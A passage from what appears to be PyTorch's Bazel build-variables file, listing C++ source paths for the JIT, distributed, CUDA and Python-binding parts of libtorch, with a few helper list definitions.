"torch/csrc/jit/api/function_impl.cpp",
"torch/csrc/jit/api/module.cpp",
"torch/csrc/jit/api/object.cpp",
"torch/csrc/jit/backends/backend_debug_handler.cpp",
"torch/csrc/jit/backends/backend_detail.cpp",
"torch/csrc/jit/backends/backend_resolver.cpp",
"torch/csrc/jit/codegen/fuser/codegen.cpp",
"torch/csrc/jit/codegen/fuser/compiler.cpp",
"torch/csrc/jit/codegen/fuser/executor.cpp",
"torch/csrc/jit/codegen/fuser/fallback.cpp",
"torch/csrc/jit/codegen/fuser/interface.cpp",
"torch/csrc/jit/codegen/fuser/kernel_cache.cpp",
"torch/csrc/jit/frontend/builtin_functions.cpp",
"torch/csrc/jit/frontend/versioned_symbols.cpp",
"torch/csrc/jit/frontend/canonicalize_modified_loop.cpp",
"torch/csrc/jit/frontend/convert_to_ssa.cpp",
"torch/csrc/jit/frontend/exit_transforms.cpp",
"torch/csrc/jit/frontend/inline_loop_condition.cpp",
"torch/csrc/jit/frontend/ir_emitter.cpp",
"torch/csrc/jit/frontend/parser.cpp",
"torch/csrc/jit/frontend/schema_matching.cpp",
"torch/csrc/jit/frontend/script_type_parser.cpp",
"torch/csrc/jit/frontend/sugared_value.cpp",
"torch/csrc/jit/frontend/tracer.cpp",
"torch/csrc/jit/ir/alias_analysis.cpp",
"torch/csrc/jit/ir/attributes.cpp",
"torch/csrc/jit/ir/constants.cpp",
"torch/csrc/jit/ir/ir.cpp",
"torch/csrc/jit/ir/irparser.cpp",
"torch/csrc/jit/ir/node_hashing.cpp",
"torch/csrc/jit/ir/scope.cpp",
"torch/csrc/jit/ir/subgraph_matcher.cpp",
"torch/csrc/jit/jit_log.cpp",
"torch/csrc/jit/jit_opt_limit.cpp",
"torch/csrc/jit/mobile/nnc/aot_compiler.cpp",
"torch/csrc/jit/mobile/nnc/backend.cpp",
"torch/csrc/jit/mobile/nnc/context.cpp",
"torch/csrc/jit/mobile/nnc/registry.cpp",
"torch/csrc/jit/passes/annotate_warns.cpp",
"torch/csrc/jit/passes/bailout_graph.cpp",
"torch/csrc/jit/passes/batch_mm.cpp",
"torch/csrc/jit/passes/canonicalize.cpp",
"torch/csrc/jit/passes/canonicalize_graph_fuser_ops.cpp",
"torch/csrc/jit/passes/clear_profiling.cpp",
"torch/csrc/jit/passes/clear_undefinedness.cpp",
"torch/csrc/jit/passes/common_subexpression_elimination.cpp",
"torch/csrc/jit/passes/concat_opt.cpp",
"torch/csrc/jit/passes/constant_pooling.cpp",
"torch/csrc/jit/passes/constant_propagation.cpp",
"torch/csrc/jit/passes/restore_mutation.cpp",
"torch/csrc/jit/passes/create_autodiff_subgraphs.cpp",
"torch/csrc/jit/passes/dead_code_elimination.cpp",
"torch/csrc/jit/passes/remove_redundant_profiles.cpp",
"torch/csrc/jit/passes/remove_exceptions.cpp",
"torch/csrc/jit/passes/decompose_ops.cpp",
"torch/csrc/jit/passes/erase_number_types.cpp",
"torch/csrc/jit/passes/fixup_trace_scope_blocks.cpp",
"torch/csrc/jit/passes/freeze_module.cpp",
"torch/csrc/jit/passes/fuse_linear.cpp",
"torch/csrc/jit/passes/fuse_relu.cpp",
"torch/csrc/jit/passes/graph_fuser.cpp",
"torch/csrc/jit/passes/graph_rewrite_helper.cpp",
"torch/csrc/jit/passes/guard_elimination.cpp",
"torch/csrc/jit/passes/hoist_conv_packed_params.cpp",
"torch/csrc/jit/passes/inline_autodiff_subgraphs.cpp",
"torch/csrc/jit/passes/inline_forked_closures.cpp",
"torch/csrc/jit/passes/inline_fork_wait.cpp",
"torch/csrc/jit/passes/inliner.cpp",
"torch/csrc/jit/passes/inplace_check.cpp",
"torch/csrc/jit/passes/insert_guards.cpp",
"torch/csrc/jit/passes/lift_closures.cpp",
"torch/csrc/jit/passes/liveness.cpp",
"torch/csrc/jit/passes/loop_unrolling.cpp",
"torch/csrc/jit/passes/lower_grad_of.cpp",
"torch/csrc/jit/passes/lower_tuples.cpp",
"torch/csrc/jit/passes/normalize_ops.cpp",
"torch/csrc/jit/passes/peephole_dict_idioms.cpp",
"torch/csrc/jit/passes/peephole_list_idioms.cpp",
"torch/csrc/jit/passes/value_refinement_utils.cpp",
"torch/csrc/jit/passes/peephole_alias_sensitive.cpp",
"torch/csrc/jit/passes/pass_manager.cpp",
"torch/csrc/jit/passes/peephole.cpp",
"torch/csrc/jit/passes/peephole_non_tensor.cpp",
"torch/csrc/jit/passes/create_functional_graphs.cpp",
"torch/csrc/jit/passes/remove_mutation.cpp",
"torch/csrc/jit/passes/prepack_folding.cpp",
"torch/csrc/jit/passes/fold_conv_bn.cpp",
"torch/csrc/jit/passes/frozen_conv_add_relu_fusion.cpp",
"torch/csrc/jit/passes/frozen_conv_folding.cpp",
"torch/csrc/jit/passes/frozen_ops_to_mkldnn.cpp",
"torch/csrc/jit/passes/frozen_graph_optimizations.cpp",
"torch/csrc/jit/passes/remove_expands.cpp",
"torch/csrc/jit/passes/remove_dropout.cpp",
"torch/csrc/jit/passes/requires_grad_analysis.cpp",
"torch/csrc/jit/passes/shape_analysis.cpp",
"torch/csrc/jit/passes/integer_value_refinement.cpp",
"torch/csrc/jit/passes/symbolic_shape_analysis.cpp",
"torch/csrc/jit/passes/specialize_autogradzero.cpp",
"torch/csrc/jit/passes/update_differentiable_graph_requires_grad.cpp",
"torch/csrc/jit/passes/variadic_ops.cpp",
"torch/csrc/jit/passes/subgraph_rewrite.cpp",
"torch/csrc/jit/passes/tensorexpr_fuser.cpp",
"torch/csrc/jit/passes/utils/memory_dag.cpp",
"torch/csrc/jit/passes/utils/subgraph_utils.cpp",
"torch/csrc/jit/passes/xnnpack_rewrite.cpp",
"torch/csrc/jit/passes/vulkan_rewrite.cpp",
"torch/csrc/jit/passes/metal_rewrite.cpp",
"torch/csrc/jit/passes/quantization/helper.cpp",
"torch/csrc/jit/passes/quantization/quantization_type.cpp",
"torch/csrc/jit/passes/quantization/insert_observers.cpp",
"torch/csrc/jit/passes/quantization/insert_quant_dequant.cpp",
"torch/csrc/jit/passes/quantization/dedup_module_uses.cpp",
"torch/csrc/jit/passes/quantization/finalize.cpp",
"torch/csrc/jit/passes/quantization/fusion_passes.cpp",
"torch/csrc/jit/python/update_graph_executor_opt.cpp",
"torch/csrc/jit/runtime/argument_spec.cpp",
"torch/csrc/jit/runtime/autodiff.cpp",
"torch/csrc/jit/runtime/graph_executor.cpp",
"torch/csrc/jit/runtime/interpreter/frame.cpp",
"torch/csrc/jit/runtime/interpreter/preprocess_graph.cpp",
"torch/csrc/jit/runtime/interpreter.cpp",
"torch/csrc/jit/runtime/logging.cpp",
"torch/csrc/jit/runtime/profiling_graph_executor_impl.cpp",
"torch/csrc/jit/runtime/profiling_record.cpp",
"torch/csrc/jit/runtime/script_profile.cpp",
"torch/csrc/jit/runtime/symbolic_script.cpp",
"torch/csrc/jit/runtime/symbolic_shape_registry.cpp",
"torch/csrc/jit/serialization/callstack_debug_info_serialization.cpp",
"torch/csrc/jit/serialization/import.cpp",
"torch/csrc/jit/serialization/import_export_helpers.cpp",
"torch/csrc/jit/serialization/import_source.cpp",
"torch/csrc/jit/serialization/pickle.cpp",
"torch/csrc/jit/serialization/python_print.cpp",
"torch/csrc/jit/serialization/source_range_serialization.cpp",
"torch/csrc/jit/tensorexpr/block_codegen.cpp",
"torch/csrc/jit/tensorexpr/bounds_inference.cpp",
"torch/csrc/jit/tensorexpr/bounds_overlap.cpp",
"torch/csrc/jit/tensorexpr/codegen.cpp",
"torch/csrc/jit/tensorexpr/cpp_codegen.cpp",
"torch/csrc/jit/tensorexpr/eval.cpp",
"torch/csrc/jit/tensorexpr/expr.cpp",
"torch/csrc/jit/tensorexpr/external_functions_registry.cpp",
"torch/csrc/jit/tensorexpr/graph_opt.cpp",
"torch/csrc/jit/tensorexpr/hash_provider.cpp",
"torch/csrc/jit/tensorexpr/intrinsic_symbols.cpp",
"torch/csrc/jit/tensorexpr/ir.cpp",
"torch/csrc/jit/tensorexpr/ir_cloner.cpp",
"torch/csrc/jit/tensorexpr/ir_mutator.cpp",
"torch/csrc/jit/tensorexpr/ir_printer.cpp",
"torch/csrc/jit/tensorexpr/ir_simplifier.cpp",
"torch/csrc/jit/tensorexpr/ir_verifier.cpp",
"torch/csrc/jit/tensorexpr/ir_visitor.cpp",
"torch/csrc/jit/tensorexpr/kernel.cpp",
"torch/csrc/jit/tensorexpr/llvm_codegen.cpp",
"torch/csrc/jit/tensorexpr/llvm_jit.cpp",
"torch/csrc/jit/tensorexpr/loopnest.cpp",
"torch/csrc/jit/tensorexpr/mem_dependency_checker.cpp",
"torch/csrc/jit/tensorexpr/operators/conv2d.cpp",
"torch/csrc/jit/tensorexpr/operators/matmul.cpp",
"torch/csrc/jit/tensorexpr/operators/norm.cpp",
"torch/csrc/jit/tensorexpr/operators/reduction.cpp",
"torch/csrc/jit/tensorexpr/operators/softmax.cpp",
"torch/csrc/jit/tensorexpr/operators/unary.cpp",
"torch/csrc/jit/tensorexpr/reduction.cpp",
"torch/csrc/jit/tensorexpr/registerizer.cpp",
"torch/csrc/jit/tensorexpr/tensor.cpp",
"torch/csrc/jit/tensorexpr/types.cpp",
"torch/csrc/jit/tensorexpr/unique_name_manager.cpp",
"torch/csrc/jit/testing/file_check.cpp",
"torch/csrc/jit/testing/hooks_for_testing.cpp",
"torch/csrc/utils/tensor_flatten.cpp",
"torch/csrc/utils/variadic.cpp",
]
core_sources_full_mobile = core_sources_full_mobile_no_backend_interface + [
"torch/csrc/jit/backends/backend_debug_info.cpp",
"torch/csrc/jit/backends/backend_interface.cpp",
]
core_sources_full = core_sources_full_mobile + [
"torch/csrc/jit/runtime/static/fusion.cpp",
"torch/csrc/jit/runtime/static/impl.cpp",
"torch/csrc/jit/runtime/static/memory_planner.cpp",
"torch/csrc/jit/runtime/static/native_ops.cpp",
"torch/csrc/jit/runtime/static/ops.cpp",
"torch/csrc/jit/runtime/static/passes.cpp",
"torch/csrc/jit/runtime/static/te_wrapper.cpp",
"torch/csrc/jit/tensorexpr/external_functions.cpp",
"torch/csrc/jit/tensorexpr/external_functions_codegen.cpp",
]
libtorch_core_sources = sorted(core_sources_common + core_sources_full + core_trainer_sources + libtorch_profiler_sources)
# These files are the only ones that are supported on Windows.
libtorch_distributed_base_sources = [
"torch/csrc/distributed/c10d/frontend.cpp",
"torch/csrc/distributed/c10d/comm.cpp",
"torch/csrc/distributed/c10d/default_comm_hooks.cpp",
"torch/csrc/distributed/c10d/FileStore.cpp",
"torch/csrc/distributed/c10d/GlooDeviceFactory.cpp",
"torch/csrc/distributed/c10d/logger.cpp",
"torch/csrc/distributed/c10d/ParamCommsUtils.cpp",
"torch/csrc/distributed/c10d/PrefixStore.cpp",
"torch/csrc/distributed/c10d/ProcessGroup.cpp",
"torch/csrc/distributed/c10d/ProcessGroupGloo.cpp",
"torch/csrc/distributed/c10d/ProcessGroupMPI.cpp",
"torch/csrc/distributed/c10d/ProcessGroupWrapper.cpp",
"torch/csrc/distributed/c10d/quantization/quantization.cpp",
"torch/csrc/distributed/c10d/reducer.cpp",
"torch/csrc/distributed/c10d/sequence_num.cpp",
"torch/csrc/distributed/c10d/Store.cpp",
"torch/csrc/distributed/c10d/TCPStore.cpp",
"torch/csrc/distributed/c10d/Utils.cpp",
]
# These files are only supported on Linux (and others) but not on Windows.
libtorch_distributed_extra_sources = [
"torch/csrc/distributed/autograd/autograd.cpp",
"torch/csrc/distributed/autograd/utils.cpp",
"torch/csrc/distributed/autograd/context/container.cpp",
"torch/csrc/distributed/autograd/context/context.cpp",
"torch/csrc/distributed/autograd/engine/dist_engine.cpp",
"torch/csrc/distributed/autograd/functions/recvrpc_backward.cpp",
"torch/csrc/distributed/autograd/functions/sendrpc_backward.cpp",
"torch/csrc/distributed/autograd/rpc_messages/autograd_metadata.cpp",
"torch/csrc/distributed/autograd/rpc_messages/propagate_gradients_req.cpp",
"torch/csrc/distributed/autograd/rpc_messages/propagate_gradients_resp.cpp",
"torch/csrc/distributed/autograd/rpc_messages/cleanup_autograd_context_req.cpp",
"torch/csrc/distributed/autograd/rpc_messages/cleanup_autograd_context_resp.cpp",
"torch/csrc/distributed/autograd/rpc_messages/rpc_with_autograd.cpp",
"torch/csrc/distributed/autograd/rpc_messages/rpc_with_profiling_req.cpp",
"torch/csrc/distributed/autograd/rpc_messages/rpc_with_profiling_resp.cpp",
"torch/csrc/distributed/autograd/rpc_messages/rref_backward_req.cpp",
"torch/csrc/distributed/autograd/rpc_messages/rref_backward_resp.cpp",
"torch/csrc/distributed/c10d/HashStore.cpp",
"torch/csrc/distributed/c10d/ProcessGroupRoundRobin.cpp",
"torch/csrc/distributed/rpc/agent_utils.cpp",
"torch/csrc/distributed/rpc/message.cpp",
"torch/csrc/distributed/rpc/profiler/remote_profiler_manager.cpp",
"torch/csrc/distributed/rpc/profiler/server_process_global_profiler.cpp",
"torch/csrc/distributed/rpc/python_call.cpp",
"torch/csrc/distributed/rpc/python_remote_call.cpp",
"torch/csrc/distributed/rpc/python_resp.cpp",
"torch/csrc/distributed/rpc/request_callback.cpp",
"torch/csrc/distributed/rpc/request_callback_no_python.cpp",
"torch/csrc/distributed/rpc/rpc_agent.cpp",
"torch/csrc/distributed/rpc/rref_context.cpp",
"torch/csrc/distributed/rpc/rref_impl.cpp",
"torch/csrc/distributed/rpc/rref_proto.cpp",
"torch/csrc/distributed/rpc/script_call.cpp",
"torch/csrc/distributed/rpc/script_remote_call.cpp",
"torch/csrc/distributed/rpc/script_resp.cpp",
"torch/csrc/distributed/rpc/tensorpipe_agent.cpp",
"torch/csrc/distributed/rpc/tensorpipe_utils.cpp",
"torch/csrc/distributed/rpc/testing/faulty_tensorpipe_agent.cpp",
"torch/csrc/distributed/rpc/torchscript_functions.cpp",
"torch/csrc/distributed/rpc/types.cpp",
"torch/csrc/distributed/rpc/utils.cpp",
]
libtorch_distributed_sources = libtorch_distributed_base_sources + libtorch_distributed_extra_sources
jit_sources_full = [
"torch/csrc/jit/codegen/cuda/interface.cpp",
"torch/csrc/jit/passes/lower_graph.cpp",
"torch/csrc/jit/runtime/register_c10_ops.cpp",
"torch/csrc/jit/runtime/register_prim_ops.cpp",
"torch/csrc/jit/runtime/register_prim_ops_fulljit.cpp",
"torch/csrc/jit/runtime/register_special_ops.cpp",
"torch/csrc/jit/passes/remove_inplace_ops.cpp",
"torch/csrc/jit/passes/utils/check_alias_annotation.cpp",
]
libtorch_core_jit_sources = sorted(jit_sources_full)
torch_mobile_core = [
# backend_debug_info.cpp provides
# __torch__.torch.classes.backend.BackendDebugInfo class
# This should not be needed eventually.
# TODO: Remove this dependency
"torch/csrc/jit/backends/backend_debug_info.cpp",
"torch/csrc/jit/mobile/function.cpp",
"torch/csrc/jit/mobile/import.cpp",
"torch/csrc/jit/mobile/interpreter.cpp",
"torch/csrc/jit/mobile/model_compatibility.cpp",
"torch/csrc/jit/mobile/module.cpp",
"torch/csrc/jit/mobile/observer.cpp",
"torch/csrc/jit/mobile/parse_bytecode.cpp",
"torch/csrc/jit/mobile/parse_operators.cpp",
"torch/csrc/jit/runtime/register_prim_ops.cpp",
"torch/csrc/jit/runtime/register_special_ops.cpp",
]
libtorch_lite_eager_symbolication = [
"torch/csrc/jit/frontend/source_range.cpp",
"torch/csrc/jit/ir/scope.cpp",
"torch/csrc/jit/mobile/debug_info.cpp",
"torch/csrc/jit/serialization/callstack_debug_info_serialization.cpp",
"torch/csrc/jit/serialization/source_range_serialization.cpp",
# Later we can split serialization and deserialization logic
# to have better separation within build and only build relevant parts.
"torch/csrc/jit/serialization/pickle.cpp",
"torch/csrc/jit/serialization/pickler.cpp",
"torch/csrc/jit/serialization/unpickler.cpp",
]
# TODO: core_trainer_sources is not necessary for libtorch lite
libtorch_lite_cmake_sources = sorted(core_trainer_sources + core_sources_common + torch_mobile_core)
libtorch_cmake_sources = libtorch_core_sources + libtorch_core_jit_sources
libtorch_extra_sources = libtorch_core_jit_sources + [
"torch/csrc/autograd/TraceTypeManual.cpp",
"torch/csrc/autograd/VariableTypeManual.cpp",
"torch/csrc/autograd/FunctionsManual.cpp",
"torch/csrc/jit/api/module_save.cpp",
"torch/csrc/jit/codegen/fuser/cpu/fused_kernel.cpp",
"torch/csrc/jit/mobile/backport.cpp",
"torch/csrc/jit/mobile/backport_manager.cpp",
# To be included for eager symbolication in lite interpreter
# when it is built in libtorch
"torch/csrc/jit/mobile/debug_info.cpp",
"torch/csrc/jit/mobile/function.cpp",
"torch/csrc/jit/mobile/import.cpp",
"torch/csrc/jit/mobile/import_data.cpp",
"torch/csrc/jit/mobile/interpreter.cpp",
"torch/csrc/jit/mobile/model_compatibility.cpp",
"torch/csrc/jit/mobile/module.cpp",
"torch/csrc/jit/mobile/observer.cpp",
"torch/csrc/jit/mobile/parse_bytecode.cpp",
"torch/csrc/jit/mobile/parse_operators.cpp",
"torch/csrc/jit/mobile/train/export_data.cpp",
"torch/csrc/jit/mobile/train/optim/sgd.cpp",
"torch/csrc/jit/mobile/train/random.cpp",
"torch/csrc/jit/mobile/train/sequential.cpp",
"torch/csrc/jit/serialization/onnx.cpp",
"torch/csrc/jit/serialization/export.cpp",
"torch/csrc/jit/serialization/export_module.cpp",
"torch/csrc/jit/serialization/import_legacy.cpp",
"torch/csrc/utils/byte_order.cpp",
"torch/csrc/utils/out_types.cpp",
]
def libtorch_sources(gencode_pattern = ":generate-code[{}]"):
return libtorch_generated_sources(gencode_pattern) + libtorch_core_sources + libtorch_distributed_sources + libtorch_extra_sources
libtorch_cuda_core_sources = [
"torch/csrc/CudaIPCTypes.cpp",
"torch/csrc/cuda/comm.cpp",
"torch/csrc/jit/codegen/fuser/cuda/fused_kernel.cpp",
"torch/csrc/autograd/profiler_cuda.cpp",
"torch/csrc/autograd/functions/comm.cpp",
"torch/csrc/jit/codegen/cuda/arith.cpp",
"torch/csrc/jit/codegen/cuda/compute_at.cpp",
"torch/csrc/jit/codegen/cuda/codegen.cpp",
"torch/csrc/jit/codegen/cuda/dispatch.cpp",
"torch/csrc/jit/codegen/cuda/expr_evaluator.cpp",
"torch/csrc/jit/codegen/cuda/executor.cpp",
"torch/csrc/jit/codegen/cuda/executor_kernel_arg.cpp",
"torch/csrc/jit/codegen/cuda/executor_launch_params.cpp",
"torch/csrc/jit/codegen/cuda/executor_utils.cpp",
"torch/csrc/jit/codegen/cuda/fusion.cpp",
"torch/csrc/jit/codegen/cuda/graph_fuser.cpp",
"torch/csrc/jit/codegen/cuda/index_compute.cpp",
"torch/csrc/jit/codegen/cuda/instrumentation.cpp",
"torch/csrc/jit/codegen/cuda/ir_base_nodes.cpp",
"torch/csrc/jit/codegen/cuda/ir_cloner.cpp",
"torch/csrc/jit/codegen/cuda/ir_graphviz.cpp",
"torch/csrc/jit/codegen/cuda/ir_nodes.cpp",
"torch/csrc/jit/codegen/cuda/ir_iostream.cpp",
"torch/csrc/jit/codegen/cuda/iter_visitor.cpp",
"torch/csrc/jit/codegen/cuda/kernel.cpp",
"torch/csrc/jit/codegen/cuda/kernel_cache.cpp",
"torch/csrc/jit/codegen/cuda/kernel_ir.cpp",
"torch/csrc/jit/codegen/cuda/kernel_ir_builder.cpp",
"torch/csrc/jit/codegen/cuda/kernel_ir_printer.cpp",
"torch/csrc/jit/codegen/cuda/lower_index.cpp",
"torch/csrc/jit/codegen/cuda/lower_loops.cpp",
"torch/csrc/jit/codegen/cuda/lower_alias_memory.cpp",
"torch/csrc/jit/codegen/cuda/lower_insert_syncs.cpp",
"torch/csrc/jit/codegen/cuda/lower_unroll.cpp",
"torch/csrc/jit/codegen/cuda/lower_thread_predicate.cpp",
"torch/csrc/jit/codegen/cuda/lower_utils.cpp",
"torch/csrc/jit/codegen/cuda/lower_validation.cpp",
"torch/csrc/jit/codegen/cuda/lower2device.cpp",
"torch/csrc/jit/codegen/cuda/manager.cpp",
"torch/csrc/jit/codegen/cuda/mutator.cpp",
"torch/csrc/jit/codegen/cuda/parser.cpp",
"torch/csrc/jit/codegen/cuda/partition.cpp",
"torch/csrc/jit/codegen/cuda/predicate_compute.cpp",
"torch/csrc/jit/codegen/cuda/register_interface.cpp",
"torch/csrc/jit/codegen/cuda/scheduler.cpp",
"torch/csrc/jit/codegen/cuda/shape_inference.cpp",
"torch/csrc/jit/codegen/cuda/tensor_view.cpp",
"torch/csrc/jit/codegen/cuda/transform_iter.cpp",
"torch/csrc/jit/codegen/cuda/transform_replay.cpp",
"torch/csrc/jit/codegen/cuda/transform_rfactor.cpp",
"torch/csrc/jit/codegen/cuda/type.cpp",
"torch/csrc/jit/tensorexpr/cuda_codegen.cpp",
"torch/csrc/jit/runtime/register_cuda_ops.cpp",
]
# These files are the only ones that are supported on Windows.
libtorch_cuda_distributed_base_sources = [
"torch/csrc/distributed/c10d/reducer_cuda.cpp",
]
# These files are only supported on Linux (and others) but not on Windows.
libtorch_cuda_distributed_extra_sources = [
"torch/csrc/distributed/c10d/frontend_cuda.cpp",
"torch/csrc/distributed/c10d/NCCLUtils.cpp",
"torch/csrc/distributed/c10d/ProcessGroupNCCL.cpp",
"torch/csrc/distributed/rpc/tensorpipe_cuda.cpp",
"torch/csrc/distributed/c10d/quantization/quantization_gpu.cu",
]
libtorch_cuda_distributed_sources = libtorch_cuda_distributed_base_sources + libtorch_cuda_distributed_extra_sources
libtorch_cuda_sources = libtorch_cuda_core_sources + libtorch_cuda_distributed_sources + [
"torch/csrc/cuda/nccl.cpp",
]
torch_cpp_srcs = [
"torch/csrc/api/src/cuda.cpp", # this just forwards stuff, no real CUDA
"torch/csrc/api/src/data/datasets/mnist.cpp",
"torch/csrc/api/src/data/samplers/distributed.cpp",
"torch/csrc/api/src/data/samplers/random.cpp",
"torch/csrc/api/src/data/samplers/sequential.cpp",
"torch/csrc/api/src/data/samplers/stream.cpp",
"torch/csrc/api/src/enum.cpp",
"torch/csrc/api/src/imethod.cpp",
"torch/csrc/api/src/jit.cpp",
"torch/csrc/api/src/serialize.cpp",
"torch/csrc/api/src/nn/init.cpp",
"torch/csrc/api/src/nn/module.cpp",
"torch/csrc/api/src/nn/modules/_functions.cpp",
"torch/csrc/api/src/nn/modules/activation.cpp",
"torch/csrc/api/src/nn/modules/adaptive.cpp",
"torch/csrc/api/src/nn/modules/batchnorm.cpp",
"torch/csrc/api/src/nn/modules/normalization.cpp",
"torch/csrc/api/src/nn/modules/instancenorm.cpp",
"torch/csrc/api/src/nn/modules/conv.cpp",
"torch/csrc/api/src/nn/modules/dropout.cpp",
"torch/csrc/api/src/nn/modules/distance.cpp",
"torch/csrc/api/src/nn/modules/embedding.cpp",
"torch/csrc/api/src/nn/modules/fold.cpp",
"torch/csrc/api/src/nn/modules/linear.cpp",
"torch/csrc/api/src/nn/modules/loss.cpp",
"torch/csrc/api/src/nn/modules/padding.cpp",
"torch/csrc/api/src/nn/modules/pixelshuffle.cpp",
"torch/csrc/api/src/nn/modules/pooling.cpp",
"torch/csrc/api/src/nn/modules/rnn.cpp",
"torch/csrc/api/src/nn/modules/upsampling.cpp",
"torch/csrc/api/src/nn/modules/transformer.cpp",
"torch/csrc/api/src/nn/modules/container/functional.cpp",
"torch/csrc/api/src/nn/options/activation.cpp",
"torch/csrc/api/src/nn/options/adaptive.cpp",
"torch/csrc/api/src/nn/options/batchnorm.cpp",
"torch/csrc/api/src/nn/options/conv.cpp",
"torch/csrc/api/src/nn/options/dropout.cpp",
"torch/csrc/api/src/nn/options/instancenorm.cpp",
"torch/csrc/api/src/nn/options/linear.cpp",
"torch/csrc/api/src/nn/options/normalization.cpp",
"torch/csrc/api/src/nn/options/embedding.cpp",
"torch/csrc/api/src/nn/options/padding.cpp",
"torch/csrc/api/src/nn/options/pooling.cpp",
"torch/csrc/api/src/nn/options/rnn.cpp",
"torch/csrc/api/src/nn/options/vision.cpp",
"torch/csrc/api/src/nn/options/transformer.cpp",
"torch/csrc/api/src/optim/adagrad.cpp",
"torch/csrc/api/src/optim/adam.cpp",
"torch/csrc/api/src/optim/adamw.cpp",
"torch/csrc/api/src/optim/lbfgs.cpp",
"torch/csrc/api/src/optim/optimizer.cpp",
"torch/csrc/api/src/optim/rmsprop.cpp",
"torch/csrc/api/src/optim/serialize.cpp",
"torch/csrc/api/src/optim/sgd.cpp",
"torch/csrc/api/src/optim/schedulers/lr_scheduler.cpp",
"torch/csrc/api/src/optim/schedulers/step_lr.cpp",
"torch/csrc/api/src/serialize/input-archive.cpp",
"torch/csrc/api/src/serialize/output-archive.cpp",
"torch/csrc/utils/crash_handler.cpp",
]
libtorch_python_cuda_core_sources = [
"torch/csrc/cuda/Event.cpp",
"torch/csrc/cuda/Module.cpp",
"torch/csrc/cuda/python_comm.cpp",
"torch/csrc/cuda/Storage.cpp",
"torch/csrc/cuda/Stream.cpp",
"torch/csrc/cuda/Graph.cpp",
"torch/csrc/cuda/serialization.cpp",
"torch/csrc/cuda/shared/cudart.cpp",
"torch/csrc/cuda/shared/nvtx.cpp",
"torch/csrc/cuda/utils.cpp",
]
libtorch_python_cuda_sources = libtorch_python_cuda_core_sources + [
"torch/csrc/cuda/python_nccl.cpp",
"torch/csrc/cuda/shared/cudnn.cpp",
"torch/csrc/cuda/Tensor.cpp",
]
libtorch_python_core_sources = [
"torch/csrc/DataLoader.cpp",
"torch/csrc/Device.cpp",
"torch/csrc/Dtype.cpp",
"torch/csrc/DynamicTypes.cpp",
"torch/csrc/Exceptions.cpp",
"torch/csrc/Generator.cpp",
"torch/csrc/Layout.cpp",
"torch/csrc/MemoryFormat.cpp",
"torch/csrc/QScheme.cpp",
"torch/csrc/Module.cpp",
"torch/csrc/python_dimname.cpp",
"torch/csrc/Size.cpp",
"torch/csrc/Storage.cpp",
"torch/csrc/Stream.cpp",
"torch/csrc/TypeInfo.cpp",
"torch/csrc/api/src/python/init.cpp",
"torch/csrc/autograd/functions/init.cpp",
"torch/csrc/autograd/init.cpp",
"torch/csrc/autograd/python_anomaly_mode.cpp",
"torch/csrc/autograd/python_saved_variable_hooks.cpp",
"torch/csrc/autograd/python_mode.cpp",
"torch/csrc/autograd/python_cpp_function.cpp",
"torch/csrc/autograd/python_engine.cpp",
"torch/csrc/autograd/python_function.cpp",
"torch/csrc/autograd/python_hook.cpp",
"torch/csrc/autograd/python_legacy_variable.cpp",
"torch/csrc/autograd/python_torch_functions_manual.cpp",
"torch/csrc/autograd/python_variable.cpp",
"torch/csrc/autograd/python_variable_indexing.cpp",
"torch/csrc/jit/backends/backend_init.cpp",
"torch/csrc/jit/python/init.cpp",
"torch/csrc/jit/passes/onnx.cpp",
"torch/csrc/jit/passes/onnx/cast_all_constant_to_floating.cpp",
"torch/csrc/jit/passes/onnx/eval_peephole.cpp",
"torch/csrc/jit/passes/onnx/constant_fold.cpp",
"torch/csrc/jit/passes/onnx/constant_map.cpp",
"torch/csrc/jit/passes/onnx/eliminate_unused_items.cpp",
"torch/csrc/jit/passes/onnx/fixup_onnx_controlflow.cpp",
"torch/csrc/jit/passes/onnx/list_model_parameters.cpp",
"torch/csrc/jit/passes/onnx/function_substitution.cpp",
"torch/csrc/jit/passes/onnx/fold_if_node.cpp",
"torch/csrc/jit/passes/onnx/helper.cpp",
"torch/csrc/jit/passes/onnx/peephole.cpp",
"torch/csrc/jit/passes/onnx/preprocess_for_onnx.cpp",
"torch/csrc/jit/passes/onnx/prepare_division_for_onnx.cpp",
"torch/csrc/jit/passes/onnx/scalar_type_analysis.cpp",
"torch/csrc/jit/passes/onnx/unpack_quantized_weights.cpp",
"torch/csrc/jit/passes/onnx/remove_inplace_ops_for_onnx.cpp",
"torch/csrc/jit/passes/onnx/shape_type_inference.cpp",
"torch/csrc/jit/python/pybind_utils.cpp",
"torch/csrc/jit/passes/onnx/pattern_conversion/common.cpp",
"torch/csrc/jit/passes/onnx/pattern_conversion/pattern_encapsulation.cpp",
"torch/csrc/jit/passes/onnx/pattern_conversion/pattern_conversion.cpp",
"torch/csrc/jit/python/python_arg_flatten.cpp",
"torch/csrc/jit/python/python_custom_class.cpp",
"torch/csrc/jit/python/python_dict.cpp",
"torch/csrc/jit/python/python_interpreter.cpp",
"torch/csrc/jit/python/python_ir.cpp",
"torch/csrc/jit/python/python_list.cpp",
"torch/csrc/jit/python/python_tracer.cpp",
"torch/csrc/jit/python/script_init.cpp",
"torch/csrc/jit/frontend/concrete_module_type.cpp",
"torch/csrc/jit/frontend/tree_views.cpp",
"torch/csrc/jit/python/python_sugared_value.cpp",
"torch/csrc/jit/python/python_tree_views.cpp",
"torch/csrc/jit/runtime/static/init.cpp",
"torch/csrc/fx/fx_init.cpp",
"torch/csrc/jit/tensorexpr/tensorexpr_init.cpp",
"torch/csrc/multiprocessing/init.cpp",
"torch/csrc/onnx/init.cpp",
"torch/csrc/serialization.cpp",
"torch/csrc/tensor/python_tensor.cpp",
"torch/csrc/utils/init.cpp",
"torch/csrc/utils/throughput_benchmark.cpp",
"torch/csrc/utils.cpp",
"torch/csrc/utils/cuda_lazy_init.cpp",
"torch/csrc/utils/invalid_arguments.cpp",
"torch/csrc/utils/object_ptr.cpp",
"torch/csrc/utils/python_arg_parser.cpp",
"torch/csrc/utils/python_dispatch.cpp",
"torch/csrc/utils/structseq.cpp",
"torch/csrc/utils/tensor_apply.cpp",
"torch/csrc/utils/tensor_dtypes.cpp",
"torch/csrc/utils/tensor_layouts.cpp",
"torch/csrc/utils/tensor_memoryformats.cpp",
"torch/csrc/utils/tensor_qschemes.cpp",
"torch/csrc/utils/tensor_list.cpp",
"torch/csrc/utils/tensor_new.cpp",
"torch/csrc/utils/tensor_numpy.cpp",
"torch/csrc/utils/tensor_types.cpp",
"torch/csrc/utils/disable_torch_function.cpp",
]
libtorch_python_distributed_core_sources = [
"torch/csrc/distributed/c10d/init.cpp",
